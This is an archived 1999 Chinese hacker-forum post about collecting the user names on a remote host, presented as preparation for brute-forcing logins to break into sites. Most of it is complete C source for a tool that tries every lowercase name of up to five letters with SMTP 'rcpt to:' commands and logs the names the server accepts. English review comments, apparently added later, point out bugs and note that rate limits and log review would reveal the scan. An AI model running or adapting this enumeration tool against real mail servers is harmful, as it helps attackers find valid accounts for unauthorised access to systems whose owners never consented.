

主题:如何获得远程主机上的用户列表
发信人: zer9()
整理人: williamlong(1999-09-28 22:15:37), 站内信件
cgi ,anonymous ftp,remote overflow...
当用尽了你所知道的技巧也不能进入站点时,
这时你只有两个选择:1。放弃 2。使用早以被你遗弃
的暴力法,强行突破。:)(I'd like this 0ne:)但为了
捍卫hacker的荣誉,当然是不能就此罢休的:)
如果让你从 telnet+/etc/passwd 或一个(或几个)用户名
+pop3hack你会选那一样?我选前者。试试就知道了.
确定远程主机上的用户名有如下几种方法: 
1.通过如finger,ruser之类的服务。
  (如 isp)
2.通过漏洞直接得到/etc/passwd,or the CORE include passwd
  (如sunos)
3.通过报纸,杂志慢慢的收集 :)
  (如。。。 电脑报 :)
4.通过sMTp(25).
...(还有什么遗漏的请告诉我哟:)
一般情况下前两种都是ADM 重点防范的对象,除非是
那些烂站,第三种你有耐心也可一试;
而第四种则是sMTp 本身固有的缺陷,
再加上sMtp的重要性,几乎绝大多数的站点都没有关闭之。
这也就成了我们利用的对象。在sMtp 的命令中,有价值
的有如下几种: VRFY,EXPN,RCPT。都可以利用。
但我测试的结果RCPt最快。具体程序如下。
                                                               zer9@21
cn.com
----Cut Here ---------------------------------------------------------
------


/* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd
 *  thr0ugh "rcpt" gain rem0te server's user list  
 *                       by                               
 *                      zer9
 *                   
 *                  [email protected]
 *
 *          test on:slackware 2.0.34&irix6.4
 *               cc rcpt.c -o rcpt
 *         后台运行:nohup ./rcpt <Target>&
 */    
                
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <signal.h>
#include <ctype.h>
#include <arpa/inet.h>

#define  SMTPPORT   25              /* TCP port that main() connects to */
#define  VERSION     "0.08"         /* printed in the usage message and in the log banner written by ver() */
#define  LogFile    "./rcpt.log"    /* opened in append mode by main(); all protocol output is logged here */
#define  TIMEOUT    200             /* seconds handed to alarm() around each "rcpt to:" send/recv pair */
#define  SleepTime  1               /* seconds slept after each "rcpt to:" before the single recv() */

int ver(void);
int look_up(int sock,char *string,char *buff);
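/* Send one command line to sock: string followed by "\n".
 *
 * The line is assembled in a fixed 100-byte buffer with snprintf, so a
 * string that does not fit (with its newline and NUL) is refused instead
 * of overflowing the buffer as the original strncpy/strncat pair could.
 * The closing brace of this function was lost in the listing; it is
 * restored here.
 *
 * Returns 0 when the complete line was handed to send(), -1 when the line
 * does not fit or send() did not accept all of it (errno is whatever
 * send() left).  Callers in this file ignore the result, so the added
 * failure reporting is backward compatible.
 */
int writeln(int sock,char *string)
{
 char sendbuf[100];
 int len = snprintf(sendbuf, sizeof sendbuf, "%s\n", string);

 if (len < 0 || (size_t)len >= sizeof sendbuf) {
  return -1;              /* would be truncated: never send a partial command */
 }
 if (send(sock, sendbuf, (size_t)len, 0) != len) {
  return -1;
 }
 return 0;
}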


int s;      /* connected SMTP socket; created in main(), passed to writeln() and look_up() */
FILE *fp;   /* LogFile opened in append mode by main(); written by main(), look_up() and ver() */

/* Entry point: connect to argv[1]'s SMTP port and append to LogFile every
 * "rcpt to:" reply that look_up() treats as an acceptance.
 *
 * argv[1] is a host name or a dotted IPv4 address.  Returns -1 on a usage,
 * log-open, resolution, socket, connect or greeting-recv failure (reported
 * with perror) or when the "help" reply does not mention RCPT; returns 0
 * after the candidate loops finish.
 *
 * Sequence: open the log, resolve the target, connect to SMTPPORT, read the
 * greeting, send "help", then RSET / HELO / "mail from:", then one
 * "rcpt to:" per lowercase candidate name of length 1 through 5
 * (26 + 26^2 + 26^3 + 26^4 + 26^5 = 12,356,630 candidates), each followed by
 * sleep(SleepTime) and a single recv().
 *
 * NOTE(review): no SIGALRM handler is installed anywhere in this listing, so
 * if alarm(TIMEOUT) fires the default disposition terminates the process
 * instead of skipping the stalled recv().
 * NOTE(review): every recv() is given sizeof(recvbuf), so a reply of 1000
 * bytes leaves no NUL terminator for the strstr() calls here and in look_up().
 * NOTE(review): fp and s are not closed on the early-return paths; process
 * exit reclaims them.
 * NOTE(review): seen from the receiving MTA this is one connection issuing
 * millions of sequential single-recipient RCPT commands, never followed by
 * DATA, at one per second for over four months.  Per-connection recipient
 * limits, rate limiting and ordinary log review all surface that pattern;
 * presumably a server that answers every RCPT the same way gives look_up()
 * nothing to distinguish.
 */
int main(int argc,char *argv[])
{
 struct sockaddr_in sin;
 struct in_addr Target;
 struct hostent *he;
 char j;                 /* unused */
 char recvbuf[1000],rcpt[200],a[8],hello_Target[500];   /* a[] holds the candidate name: loop counters + NUL */
 
 if(argc!=2)
  {
   printf("Rcpt %s   by zer9[FTT]  mailto: [email protected]\n",VERSION);

   printf("Usage: %s <Target>\n",argv[0]);
   return -1; 
  }
 if((fp=fopen(LogFile,"a+"))==NULL)
 {
  perror("fopen");
  return -1; 
 }
 /* name lookup first, dotted-quad fallback second */
 if((he=gethostbyname(argv[1]))!=NULL)
 {
  bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length);
 }
 else
  Target.s_addr=inet_addr(argv[1]);
 if(Target.s_addr==-1)   /* inet_addr() returns INADDR_NONE (all ones) for an unparsable address */
  {
   perror("gethostbyname");
   return -1; 
  }
  ver();                 /* version banner into the log */
  fprintf(fp,"@Target: %s   ",argv[1]);
  if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
perror("sock");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(SMTPPORT);
sin.sin_addr.s_addr=Target.s_addr;
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
bzero(a,sizeof(a));
/* NOTE(review): the string literal below is split across two lines in this
 * listing and must be rejoined to compile. */
fprintf(fp,"=========================================================
======\n");
if(recv(s,recvbuf,sizeof(recvbuf),0)<0) /* get Title */
{
perror("recv");
return -1;
}
fprintf(fp,"%s\n",recvbuf);
writeln(s,"help");
recv(s,recvbuf,sizeof(recvbuf),0);      /* return value not checked; recvbuf keeps whatever arrived */
fprintf(fp,"%s",recvbuf);
if(strstr(recvbuf,"RCPT")==NULL) /* check RCPT */
{
perror("no RCPT command. exit...");     /* perror appends strerror(errno), which is unrelated here */
return -1;
}
fprintf(fp,"------------------------------------\n");
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"RSET");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
strcpy(hello_Target,"HELO ");
strcat(hello_Target,"default");         /* fixed "HELO default" */
writeln(s,hello_Target);
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"mail from: [email protected]"); /*ma1l fr0m: [email protected]*/

recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
fprintf(fp,"------------------------------------\n");

/* 1 bits: every one-letter name a..z */
for(a[0]='a';a[0]<='z';a[0]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c",a[0]);                   /* a[] is both counter and text; the %c args are read before sprintf writes */
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);                         /* watchdog around send+recv; no handler installed, see NOTE above */
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);      /* one read per candidate; return value not checked */
alarm(0);
look_up(s,rcpt,recvbuf);                /* logs the reply when it reads as accepted */
}

/* 2 bits: every two-letter name aa..zz; same per-candidate steps as stage 1 */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c",a[0],a[1]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 3 bits: every three-letter name; same steps as stage 1 */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c",a[0],a[1],a[2]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 4 bits: every four-letter name; same steps as stage 1 */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
for(a[3]='a';a[3]<='z';a[3]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c%c",a[0],a[1],a[2],a[3]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 5 bits: every five-letter name (11,881,376 of them); same steps as stage 1 */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
for(a[3]='a';a[3]<='z';a[3]++)
for(a[4]='a';a[4]<='z';a[4]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c%c%c",a[0],a[1],a[2],a[3],a[4]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}

/* The author's earlier fixed-list variant, left disabled. */
/*in=fdopen(s,"r");
writeln(s,"rcpt to: hacker");
writeln(s,"rcpt to: root");
writeln(s,"rcpt to: sun");
writeln(s,"rcpt to: zero");
writeln(s,"rcpt to: zer0");
writeln(s,"rcpt to: uucp");
writeln(s,"rcpt to: 12345");
writeln(s,"rcpt to: ftp");
writeln(s,"rcpt to: guest");
writeln(s,"rcpt to: oracle");
writeln(s,"rcpt to: 345");
writeln(s,"rcpt to: uucp");

writeln(s,"QUIT");

while(fgets(recvbuf,sizeof(recvbuf),in)!=NULL)
{
if(strstr(recvbuf,"ok")!=NULL)
printf("%s",recvbuf);
fflush(in);
}
fclose(in); */
/* NOTE(review): this string literal is also split across two lines in this
 * listing and must be rejoined to compile. */
fprintf(fp,"=========================================================
====\n");
fprintf(fp,"okay!\n\n\n\n\n");
fclose(fp);
close(s);                               /* no QUIT is sent on this path; the connection is simply dropped */
return 0;
}


/* Record a reply that reads as an accepted recipient.
 *
 * sock and string are part of the call signature but are not used; only
 * the reply text in buff is inspected.  When buff contains "ent ok" (the
 * tail of sendmail 8.8.7's "Recipient ok", per the author) the whole reply
 * is appended to the global log fp.  The log is flushed on every call,
 * match or not.  Always returns 0.
 */
int look_up(int sock,char *string,char *buff)
{
 const char *accepted = strstr(buff, "ent ok");

 (void)sock;
 (void)string;
 if (accepted != NULL) {
  fputs(buff, fp);
 }
 fflush(fp);
 return 0;
}

/* Append the version banner (VERSION) to the global log fp.  Always returns 0. */
int ver(void)
{
 fputs("\n###############################\n", fp);
 fprintf(fp, "Rcpt %s by zer9[FTT] mailto: [email protected]\n", VERSION);
 return 0;
}


